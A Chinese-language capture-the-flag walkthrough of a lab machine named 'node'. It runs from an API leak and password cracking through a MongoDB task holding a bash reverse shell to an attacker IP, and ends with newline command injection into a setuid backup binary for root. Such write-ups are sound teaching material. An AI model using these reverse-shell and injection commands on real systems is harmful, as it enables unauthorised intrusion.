信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.58 | TCP:22,3000 |
$ nmap -p- 10.10.10.58 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
|_http-title: MyPlace
| hadoop-tasktracker-info:
|_ Logs: /login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP & Backup zip
http://10.10.10.58:3000/
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图](https://img.4awl.net/img/eb/46ccc5c0ba1d0a15a36d2fb1df96c9.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图")
http://10.10.10.58:3000/api/users/
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图1](https://img.4awl.net/img/97/4d8420c71d0ad26b757d00676d1ca8.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图1")
https://crackstation.net/
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图2](https://img.4awl.net/img/1c/545aaf3cdef58453ce9321485503b8.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图2")
http://10.10.10.58:3000/login
username:myP14ceAdm1nAcc0uNT,tom,mark,rastating
password:manchester,spongebob,snowflake,NULL
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图3](https://img.4awl.net/img/eb/f66b2a7269b157c4236112feb011cd.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图3")
$ binwalk myplace.backup
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图4](https://img.4awl.net/img/4b/e18f742b1a92537b857bd0350bc567.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图4")
$ cat myplace.backup|base64 -d >myplace.backup.decode
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图5](https://img.4awl.net/img/b7/cc43cca85e7f5585e6207a3670b7dc.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图5")
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图6](https://img.4awl.net/img/63/eac1c93ec7286336296057aea2ecc0.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图6")
$ zip2john myplace.backup.decode -o myplace.backup.decode.john
$ john --wordlist=/usr/share/wordlists/rockyou.txt myplace.backup.decode.john
password:magicword
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图7](https://img.4awl.net/img/f9/f87a754fedf916db7e1c3823b0764d.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图7")
$ unzip myplace.backup.decode
$ cat var/www/myplace/app.js
mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图8](https://img.4awl.net/img/bc/c447429f5f50ec80838576069b8dcc.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图8")
TRP00F Skip Root
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10033 --rhost 10.10.16.24 --rport 10034 --http 9999 --password '5AYRft73VtFpc84k'
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图9](https://img.4awl.net/img/90/4c550fae9351d6e27c9910e898ba59.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图9")
mark to tom & mongoDB 任务注入
$ ssh [email protected]
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图10](https://img.4awl.net/img/18/e8854205a3afba10186761701d18c3.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图10")
$ cat /var/www/myplace/app.js
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图11](https://img.4awl.net/img/26/9037c852294365b9206ce21add4494.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图11")
该脚本将连接到Mongo数据库,然后每30秒运行一系列命令。它将从任务集合中获取项。对于每个文档,它会将doc.cmd传递给exec运行它,然后删除该文档。
$ mongo -u mark -p 5AYRft73VtFpc84k scheduler> show collections> db.tasks.insert({"cmd": "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.24/10035 0>&1'"})> db.tasks.find()
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图12](https://img.4awl.net/img/bd/b079b4812e41d3591278b4715c1147.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图12")
User.txt
b0ca19843af3d049a782f7f16b0cf144
权限提升 & 命令注入
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图13](https://img.4awl.net/img/6e/e8b81a633669477d3b58e01f888ca3.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图13")
$ file /usr/local/bin/backup
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图14](https://img.4awl.net/img/06/d0e02ccbd6dcdcbcc9eaf01e6c395d.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图14")
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图15](https://img.4awl.net/img/a9/75b961139f364c901584a1fdb9a449.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图15")
在第一个参数中存在一个-q选项
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图16](https://img.4awl.net/img/e7/e42b4207ca55db225b9e6deaa1b33a.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图16")
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图17](https://img.4awl.net/img/37/b6694bd1ff6346e1d3aca68f9b415d.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图17")
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图18](https://img.4awl.net/img/a9/64ceb8cb6dc1b8e4648a9670f60046.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图18")
$ /usr/local/bin/backup -q "" '
/bin/bash'
![[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图19](https://img.4awl.net/img/b3/a9fa2a66efcb758476e9216ca261ed.jpg "[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图19")
Root.txt
2278ab816e1cd3204d1b331144bf9704
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
